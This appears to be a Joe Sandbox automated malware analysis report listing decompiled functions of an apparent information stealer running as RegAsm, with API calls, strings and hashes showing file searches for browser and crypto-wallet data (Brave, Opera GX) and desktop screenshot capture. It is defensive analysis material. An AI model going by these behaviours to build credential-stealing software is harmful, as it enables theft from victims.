                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                            • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                            • API String ID: 3869166975-1816240570
                                                                            • Opcode ID: 9804cbcb6549636e7edce159aa3ee5a2d29b2506f6b57e35bae4b86771403b22
                                                                            • Instruction ID: 88dffd7cdbcf1f4ae3e67456db78224bf6b474b6b2878ab6084e2e33bf0d65cc
                                                                            • Opcode Fuzzy Hash: 9804cbcb6549636e7edce159aa3ee5a2d29b2506f6b57e35bae4b86771403b22
                                                                            • Instruction Fuzzy Hash: 67826070900288EADF25EBA5C955BDDBBB4AF19304F5040BEE449B32C2DB78174CCB66
                                                                            Function 004153F6 Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 316stringfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2402 4153f6-415469 _EH_prolog call 4181c0 wsprintfA FindFirstFileA memset * 2 2405 41581b-415835 call 401061 2402->2405 2406 41546f-415483 StrCmpCA 2402->2406 2407 415489-41549d StrCmpCA 2406->2407 2408 4157fa-41580c FindNextFileA 2406->2408 2407->2408 2410 4154a3-4154df wsprintfA StrCmpCA 2407->2410 2408->2406 2411 415812-415815 FindClose 2408->2411 2413 4154e1-4154f9 wsprintfA 2410->2413 2414 4154fb-41550a wsprintfA 2410->2414 2411->2405 2415 41550d-41553e memset lstrcat 2413->2415 2414->2415 2416 415561-41556b strtok_s 2415->2416 2417 415540-415551 2416->2417 2418 41556d-4155a1 memset lstrcat 2416->2418 2423 415785-41578b 2417->2423 2426 415557-415560 2417->2426 2419 4156e1-4156eb strtok_s 2418->2419 2420 4156f1 2419->2420 2421 4155a6-4155b6 PathMatchSpecA 2419->2421 2420->2423 2424 4156d7-4156e0 2421->2424 2425 4155bc-4156bb call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 3 call 410f12 call 418360 2421->2425 2423->2408 2427 41578d-415799 2423->2427 2424->2419 2470 4156f6-415705 2425->2470 2471 4156bd-4156d2 call 40fb4d call 40f98e 2425->2471 2426->2416 2427->2411 2429 41579b-4157a3 2427->2429 2429->2408 2431 4157a5-4157ef call 4010b1 call 4153f6 2429->2431 2439 4157f4 2431->2439 2439->2408 2472 415836-415841 call 40f98e 2470->2472 2473 41570b-41572e call 40f95a call 40618b 2470->2473 2471->2424 2472->2405 2484 415730-415775 call 40f923 call 4010b1 call 414437 call 40f98e 2473->2484 2485 41577a-415780 call 40f98e 2473->2485 2484->2485 2485->2423
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004153FB
                                                                            • wsprintfA.USER32 ref: 00415421
                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                            • memset.MSVCRT ref: 0041544F
                                                                            • memset.MSVCRT ref: 0041545D
                                                                            • StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                            • StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                            • wsprintfA.USER32 ref: 004154B9
                                                                            • StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                            • wsprintfA.USER32 ref: 004154F0
                                                                            • wsprintfA.USER32 ref: 00415504
                                                                            • memset.MSVCRT ref: 00415516
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                            • strtok_s.MSVCRT ref: 00415561
                                                                            • memset.MSVCRT ref: 00415576
                                                                            • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                            • strtok_s.MSVCRT ref: 004156E1
                                                                            • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                            • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                            • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                            • API String ID: 264515753-332874205
                                                                            • Opcode ID: d20dc5bdacd583ed27b03aefafc9fd92c8039eee4d847269b8182252768ee144
                                                                            • Instruction ID: ca9661dadf250ee48b6985f068276dcce33099c5ed12ff06a98e026076f1a7f9
                                                                            • Opcode Fuzzy Hash: d20dc5bdacd583ed27b03aefafc9fd92c8039eee4d847269b8182252768ee144
                                                                            • Instruction Fuzzy Hash: F2C160B1D0015DEEDF20EBE4DC45EDEBBBCAB08304F50406AF519A3191DB389A49CB65
                                                                            Function 6CC335A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3192 6cc335a0-6cc335be 3193 6cc335c4-6cc335ed InitializeCriticalSectionAndSpinCount getenv 3192->3193 3194 6cc338e9-6cc338fb call 6cc6b320 3192->3194 3196 6cc335f3-6cc335f5 3193->3196 3197 6cc338fc-6cc3390c strcmp 3193->3197 3200 6cc335f8-6cc33614 QueryPerformanceFrequency 3196->3200 3197->3196 3199 6cc33912-6cc33922 strcmp 3197->3199 3201 6cc33924-6cc33932 3199->3201 3202 6cc3398a-6cc3398c 3199->3202 3203 6cc3361a-6cc3361c 3200->3203 3204 6cc3374f-6cc33756 3200->3204 3205 6cc33622-6cc3364a _strnicmp 3201->3205 3209 6cc33938 3201->3209 3202->3200 3203->3205 3206 6cc3393d 3203->3206 3207 6cc3396e-6cc33982 3204->3207 3208 6cc3375c-6cc33768 3204->3208 3210 6cc33650-6cc3365e 3205->3210 3211 6cc33944-6cc33957 _strnicmp 3205->3211 3206->3211 3207->3202 3212 6cc3376a-6cc337a1 QueryPerformanceCounter EnterCriticalSection 3208->3212 3209->3204 3213 6cc33664-6cc336a9 GetSystemTimeAdjustment 3210->3213 3214 6cc3395d-6cc3395f 3210->3214 3211->3210 3211->3214 3215 6cc337b3-6cc337eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 3212->3215 3216 6cc337a3-6cc337b1 3212->3216 3217 6cc33964 3213->3217 3218 6cc336af-6cc33749 call 6cc6c110 3213->3218 3219 6cc337ed-6cc337fa 3215->3219 3220 6cc337fc-6cc33839 LeaveCriticalSection 3215->3220 3216->3215 3217->3207 3218->3204 3219->3220 3222 6cc33846-6cc338ac call 6cc6c110 3220->3222 3223 6cc3383b-6cc33840 3220->3223 3227 6cc338b2-6cc338ca 3222->3227 3223->3212 3223->3222 3228 6cc338dd-6cc338e3 3227->3228 3229 6cc338cc-6cc338db 3227->3229 3228->3194 3229->3227 3229->3228
                                                                            APIs
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBF688,00001000), ref: 6CC335D5
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC335E0
                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 6CC335FD
                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC3363F
                                                                            • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC3369F
                                                                            • __aulldiv.LIBCMT ref: 6CC336E4
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CC33773
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC3377E
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC337BD
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CC337C4
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC337CB
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC33801
                                                                            • __aulldiv.LIBCMT ref: 6CC33883
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC33902
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC33918
                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC3394C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                            • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                            • API String ID: 301339242-3790311718
                                                                            • Opcode ID: bce91024ca0b33ad1c7eb9efa07ebd08f3abaf721314da05dbca1aae7698ec0c
                                                                            • Instruction ID: 43f56405c037018c2c9e4feb9d2439c0183ddd71e891c25ef2bc61644d77eb84
                                                                            • Opcode Fuzzy Hash: bce91024ca0b33ad1c7eb9efa07ebd08f3abaf721314da05dbca1aae7698ec0c
                                                                            • Instruction Fuzzy Hash: EAB1F879B043119FDB08DFA8D85561A77F5FB8A700F09892EE899D3750E770D801CB9A
                                                                            Function 004162AF Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227stringfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004162B4
                                                                            • wsprintfA.USER32 ref: 004162D4
                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                            • StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                            • StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                            • wsprintfA.USER32 ref: 00416346
                                                                            • StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                            • wsprintfA.USER32 ref: 00416374
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • wsprintfA.USER32 ref: 00416388
                                                                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                            • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                            • lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                            • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                            • lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                            • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                            • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                            • API String ID: 3254224521-445461498
                                                                            • Opcode ID: f1e2c898751335988b89725b49f2b994cd233f31897e165e0f6e33926c86069b
                                                                            • Instruction ID: 44fee943ad19fbeb295e67141fcee366af0812e97ca0ac8f0a151d0c2a205fa7
                                                                            • Opcode Fuzzy Hash: f1e2c898751335988b89725b49f2b994cd233f31897e165e0f6e33926c86069b
                                                                            • Instruction Fuzzy Hash: 97918C71900259ABDF10EBE4DD4ABDEBBBDAF09304F4040BAF505A3191DB389B48CB65
                                                                            Function 004112FD Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00411302
                                                                            • memset.MSVCRT ref: 00411328
                                                                            • GetDesktopWindow.USER32 ref: 0041135E
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                            • GetDC.USER32(00000000), ref: 00411372
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                            • GlobalFix.KERNEL32(?), ref: 00411412
                                                                            • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                              • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                              • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                              • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                            • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                            • DeleteObject.GDI32(?), ref: 004114B3
                                                                            • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                            • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                            • CloseWindow.USER32(00000000), ref: 004114CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                            • String ID: image/jpeg
                                                                            • API String ID: 3067874393-3785015651
                                                                            • Opcode ID: 3bdf46d3e9d7c0e78ba7912a53a363b2d7867d1b528b743ce995cd4dcfebb4b6
                                                                            • Instruction ID: b777bc6b67979350ab37bc7b6ce454515ef26c15ee534ccd721ea0ab8c47e668
                                                                            • Opcode Fuzzy Hash: 3bdf46d3e9d7c0e78ba7912a53a363b2d7867d1b528b743ce995cd4dcfebb4b6
                                                                            • Instruction Fuzzy Hash: 385118B2D00218AFDF01AFE5DD499EEBFB9FF09714F10402AFA05E2160D7394A558BA5
                                                                            Function 00415AC2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00415AC7
                                                                            • wsprintfA.USER32 ref: 00415AEA
                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00415B01
                                                                            • StrCmpCA.SHLWAPI(?,0042687C), ref: 00415B23
                                                                            • StrCmpCA.SHLWAPI(?,00426880), ref: 00415B3D
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415B72
                                                                            • lstrcat.KERNEL32(?), ref: 00415B85
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415B99
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415BA9
                                                                            • lstrcat.KERNEL32(?,00426884), ref: 00415BBB
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415BCF
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00415C69
                                                                            • FindClose.KERNEL32(00000000), ref: 00415C78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                            • String ID: %s\%s
                                                                            • API String ID: 2282932919-4073750446
                                                                            • Opcode ID: 8a485682f3bd560c78555ff2535f4c5e4a83989996905e60acd5c30d46b0b76a
                                                                            • Instruction ID: 88f705c6070867334dedd45070e8c549d2cf59d2b969f0f0e11c1cc9a72add11
                                                                            • Opcode Fuzzy Hash: 8a485682f3bd560c78555ff2535f4c5e4a83989996905e60acd5c30d46b0b76a
                                                                            • Instruction Fuzzy Hash: 68512D7290022DABDF11EBA1DD49EDE7B7CAF49304F0004AAE509E3151E7389785CBA4
                                                                            Function 00409F72 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 628fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00409F77
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425BAE,00000000,-00000020,00000000), ref: 00409FF6
                                                                            • StrCmpCA.SHLWAPI(?,00425E10), ref: 0040A050
                                                                            • StrCmpCA.SHLWAPI(?,00425E14), ref: 0040A06A
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera,00425BBB,00425BBA,00425BB7,00425BB6,00425BB3,00425BB2,00425BAF), ref: 0040A0FD
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A111
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A125
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
